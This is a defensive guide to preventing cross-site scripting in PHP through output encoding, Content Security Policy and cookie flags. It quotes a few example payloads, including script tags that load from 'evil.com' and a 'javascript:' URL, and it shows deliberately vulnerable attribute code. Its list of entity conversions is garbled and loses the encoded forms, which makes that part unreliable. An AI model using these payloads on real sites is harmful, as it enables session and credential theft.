Cross-Site Scripting in PHP: Why Output Encoding Is the Real Fix
Most articles about cross-site scripting start with advice about filtering user input. Strip script tags. Remove angle brackets. Sanitise at the door. It sounds like good advice, and it creates a false sense of security. Input sanitisation is a reactive game you will eventually lose. Output encoding is the proactive, consistent solution that closes the vulnerability at the point where it actually matters: when data leaves your application and reaches the browser.
If you write PHP that handles user data, understanding this distinction is not optional. It is the difference between code that holds up under attack and code that gives you a false sense of security while leaving the door open. This guide covers what XSS actually does, why input filtering cannot be relied upon, how output encoding works in PHP, where to apply it across different HTML contexts, what additional defence layers exist, and what to check in your existing code. Every section is written to give you something you can act on immediately.
What Cross-Site Scripting Actually Is
Cross-site scripting, universally abbreviated XSS, is a vulnerability class that allows an attacker to inject executable code into pages served to other users. The injected payload is almost always JavaScript, because JavaScript runs in the victim's browser and has access to everything the browser has access to under your domain.
When a malicious script runs under your domain, the consequences are serious. It can read cookies that do not have the HttpOnly flag set. It can read the full contents of the page including any sensitive data displayed after login. It can make HTTP requests to your server that are indistinguishable from requests made by the victim, including requests that transmit session tokens, form data, or API responses. It can redirect users to attacker-controlled domains. It can rewrite the page content in real time to harvest credentials or display phishing prompts. In worst-case scenarios chained with other vulnerabilities, it can lead to remote code execution on the server.
The attack starts when your application takes user input and returns it in a page response without proper encoding. A search box that displays "You searched for X" is a textbook example. If someone types a script tag into that search box and the application reflects it back without encoding, every subsequent visitor who loads the page executes that injected script automatically. The attacker does not need to target specific users. Automated scanners find these vulnerabilities within minutes of crawling a new application, and exploit kits weaponise them without manual intervention.
XSS falls into three categories that matter for how you fix them. Reflected XSS returns user input in the immediate response without storing it. Search parameters, error messages, and URL parameters are common vectors. The victim must click a specifically crafted link for the attack to work. Stored XSS saves malicious input to a database or file and serves it to every user who views the affected page. Blog comments, user profile fields, and forum posts are typical entry points. This is generally more severe because it requires no user interaction beyond visiting the page. DOM-based XSS occurs entirely on the client side. The server sends a page where client-side JavaScript reads user input and inserts it into the Document Object Model without proper sanitisation. The server response may be completely clean. The vulnerability lives in the JavaScript, not the server-side PHP code.
Why Input Sanitisation Cannot Be Trusted
Input sanitisation tries to solve the problem at the wrong point. You inspect incoming data, remove or escape what looks dangerous, and store the cleaned version. The theory makes sense. The practice falls apart for reasons that are not hypothetical.
Browsers interpret HTML and JavaScript in ways that are not intuitive and that evolve between versions. A script tag can be written as <script>, <SCRIPT>, <scRipt>, <script/src=//evil.com>, using HTML entity encoding like <script>, using Unicode escapes like \u003cscript\u003e, or with null-byte injection that terminates the string before the filter sees the dangerous part. Filters that block the obvious <script> tag routinely miss these variants. There are encoding mismatches between how PHP reads a string, how a database stores it, and how the browser parses it. Each step in that chain can interpret the same bytes differently, and a filter calibrated for one interpretation may fail against another.
What is dangerous depends entirely on context. The same string is safe inside a text node, dangerous inside an HTML attribute value, and catastrophic inside a script block. A filter that is correct for one context may be completely wrong for another. Designing one input sanitisation strategy that is safe in every possible output context is an unsolved problem in general form. Getting it wrong in one place, even slightly, is enough to compromise the entire application.
New bypass techniques are published regularly. The security research community finds encoding tricks, parser differentials, and character injection methods that defeat current filters. An application that was secure last month may have a known bypass published next week. Input filters based on pattern matching cannot adapt quickly enough to keep pace with a community actively looking for ways around them.
Input sanitisation has a legitimate role as a secondary defence for specific use cases such as rich text fields that must accept HTML markup. For general data fields, it cannot be your primary XSS protection. You can learn more about a practical approach to PHP security for business websites by reviewing a PHP security checklist for business websites.
Output Encoding: The Correct Solution
Output encoding converts data into a safe representation at the point where it is inserted into HTML. The browser receives the encoded version and renders it as text, not as markup or code. An attack payload stored in your database gets displayed harmlessly as text on the page instead of executing as JavaScript.
The correct PHP function for HTML context is htmlspecialchars(). It converts the five characters that have special meaning in HTML into their entity equivalents:
- Less-than (
<) becomes< - Greater-than (
>) becomes> - Ampersand (
&) becomes& - Double quotes (
") become"when ENT_QUOTES is set - Single quotes (
') become'or'when ENT_QUOTES is set
The correct usage in modern PHP looks like this:
echo htmlspecialchars($userInput, ENT_QUOTES, 'UTF-8');
The three arguments are not optional. ENT_QUOTES ensures both single and double quotes are encoded, which is essential for any value that appears inside an HTML attribute. Using htmlspecialchars() without ENT_QUOTES on data that ends up inside an attribute leaves a direct injection path. The third argument, 'UTF-8', ensures the encoding behaves correctly for the actual character set in use. Using an incorrect character set, such as ISO-8859-1 when the page is UTF-8, creates a mismatch that attackers can exploit to bypass the encoding entirely.
Where Output Encoding Must Be Applied
Every point where dynamic data reaches HTML output requires encoding. This is not optional and it is not optional in only some places. Missing it in one location creates an active XSS vulnerability. The contexts that matter most are HTML body text, HTML attribute values, JavaScript context, CSS context, and URL contexts. Each has its own encoding rules, and using HTML encoding in JavaScript context does not provide adequate protection.
For HTML body content, the most common context, htmlspecialchars() with ENT_QUOTES and UTF-8 is the correct tool. This is straightforward and reliable when applied consistently.
// Correct for HTML body text
echo htmlspecialchars($userName, ENT_QUOTES, 'UTF-8');
// Safe output in a paragraph
<p><?php echo htmlspecialchars($commentText, ENT_QUOTES, 'UTF-8'); ?></p>
For HTML attribute values, the attribute must be quoted, ideally with double quotes. The value inside the quotes needs htmlspecialchars(). Without quotes, an attacker can terminate the attribute early and inject new attributes or content. Even with quotes, if the attribute value is not encoded, injection is straightforward.
// Incorrect: no quotes, no encoding
<input name="username" value=<?php echo $userInput; ?>>
// Incorrect: quotes but no encoding
<input name="username" value="<?php echo $userInput; ?>">
// Correct: quoted and encoded
<input name="username" value="<?php echo htmlspecialchars($userInput, ENT_QUOTES, 'UTF-8'); ?>">
For JavaScript context inside <script> tags or event handlers like onclick, HTML encoding is not sufficient. You need JavaScript-specific escaping, which is significantly more complex. The reliable approach is to avoid inline JavaScript entirely and use data attributes to pass PHP values to separate JavaScript files, where they can be handled with proper escaping.
// Passing PHP data to JavaScript safely via data attributes
<script>
var userData = JSON.parse('<?php echo json_encode($userDataArray, JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP); ?>');
</script>
If you use a modern template engine, check whether it performs automatic output encoding by default. Twig does. Laravel's Blade does in most contexts. Raw PHP does not. Raw PHP gives you full control, which means full responsibility for getting every output point correct.
For URL contexts, use urlencode() or rawurlencode() on individual parameter values before inserting them into a URL string. Never concatenate raw user input into a URL, even if the value looks harmless. A value like javascript:alert(1) in an unencoded href attribute is a working XSS payload.
Content Security Policy as a Defence Layer
Correct output encoding should stop XSS from executing. Defence in depth means having a secondary layer in case encoding is missed somewhere. Content-Security-Policy headers tell the browser explicitly which sources of content are permitted to execute on your page. A properly configured CSP can prevent XSS from running even if some output encoding is absent or incorrect.
A restrictive CSP blocks inline scripts and limits script sources to your own origin by default. A basic restrictive policy looks like:
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self';
This tells the browser that JavaScript may only load from the same origin, no plugins are permitted, and the base URL for relative links must also come from the same origin. An injected <script src="http://evil.com/payload.js"> will be blocked because evil.com is not in the script-src directive.
Configuring CSP correctly requires auditing every piece of content your pages load. External scripts, analytics platforms, advertising networks, embedded video players, social media widgets, and CDN-hosted libraries all need to be permitted explicitly, or your CSP will break them. Start with a report-only policy to identify violations without blocking anything:
Content-Security-Policy-Report-Only: default-src 'self'; report-uri /csp-report;
Review the reports, adjust the policy to allow legitimate resources, then enable enforcement once the report-only run is clean. Understanding HTTPS and TLS configuration is closely related to security headers like CSP, and both contribute to a secure website configuration.
HTTPOnly and Secure Flags on Session Cookies
XSS and session theft are closely related. If XSS can read your session cookie, the attacker has full access to the authenticated session without needing the password. The HttpOnly flag instructs the browser to withhold the cookie from JavaScript access. Most modern browsers honour this flag. It does not stop all XSS cookie theft but it removes the most common script-based attack path.
The Secure flag instructs the browser only to transmit the cookie over HTTPS connections. This prevents interception on unencrypted network paths. Without it, an attacker on the same WiFi network or at any point in the network path can read the session cookie in plain text.
ini_set('session.cookie_httponly', 1);
ini_set('session.cookie_secure', 1);
ini_set('session.cookie_samesite', 'Strict');
SameSite: Strict means the browser never sends the cookie on any cross-site request, which also provides meaningful protection against cross-site request forgery attacks. These flags do not fix XSS, but they significantly limit what an attacker can achieve even when XSS exists. If you are running a WordPress site or another CMS, these protections are worth checking as part of a WordPress security audit or similar review process.
Real-World Impact of XSS on Business Applications
XSS is consistently rated as one of the most prevalent and impactful web application vulnerabilities in every major security survey. The consequences are not abstract, and for businesses operating in the UK or internationally, the implications extend beyond technical damage to include reputational harm and regulatory concerns.
For an e-commerce application, XSS can steal session cookies to take over accounts, capture payment card details entered into forms, or redirect users to phishing pages that mirror the legitimate checkout flow. For a SaaS application, XSS can expose business data, customer information, and API credentials to an attacker. For a CMS, XSS in an administrator session can lead to full server compromise through further exploitation such as uploading malicious plugins or modifying server configuration.
Attackers do not target specific applications manually. Automated tools crawl the web looking for XSS, report findings, and enable mass exploitation. The window between a vulnerability being introduced and it being found is often measured in hours for applications with meaningful traffic. For high-profile targets, it can be minutes.
Beyond the technical fix, building a security-aware culture matters. Ensuring that everyone involved in building and maintaining web applications understands the risks and knows how to respond appropriately is part of running a secure operation. A practical approach to IT security awareness training can help teams recognise and avoid common mistakes that introduce vulnerabilities.
Auditing Your PHP Code for XSS Vulnerabilities
Knowing what XSS is and how to fix it is only half the work. Finding vulnerabilities in existing code requires a systematic approach. Start by searching every PHP file for echo, print, and printf statements that output variables, function results, or any external data.
For each output point, verify that htmlspecialchars() or equivalent encoding is applied with ENT_QUOTES and the correct character set. Pay particular attention to output inside HTML attributes, inside <script> blocks, and inside inline event handlers like onclick, onerror, and onload.
Automated scanners like OWASP ZAP and Burp Suite can crawl your application and test each parameter with a range of XSS payloads including known filter bypasses. They do not find everything, but they find the obvious gaps quickly. Combine automated scanning with manual code review for best coverage.
When vulnerabilities are found, document them clearly so they can be tracked and resolved. Good IT documentation practices help teams maintain security knowledge and track remediation progress over time.
Where to Focus Your Security Efforts
If you take one thing from this article, let it be this: output encoding at the point of display is the reliable fix for XSS. Input sanitisation is a last resort for specific use cases, not a primary strategy. The practical steps are straightforward: use htmlspecialchars() with ENT_QUOTES and UTF-8 at every output point, audit your existing code for missing encoding, add Content Security Policy headers as a secondary defence, and configure session cookies with HttpOnly, Secure, and SameSite flags.
Security is not a one-time fix. Review your code when you add new features, update your dependencies, or change your output contexts. New bypass techniques emerge regularly, and what was secure last year may need re-evaluation this year.
If you need help reviewing your current PHP setup, prepare a short note with your codebase location, the frameworks you use, and the output contexts that are most likely to have been missed. That gives a clear starting point for a practical review.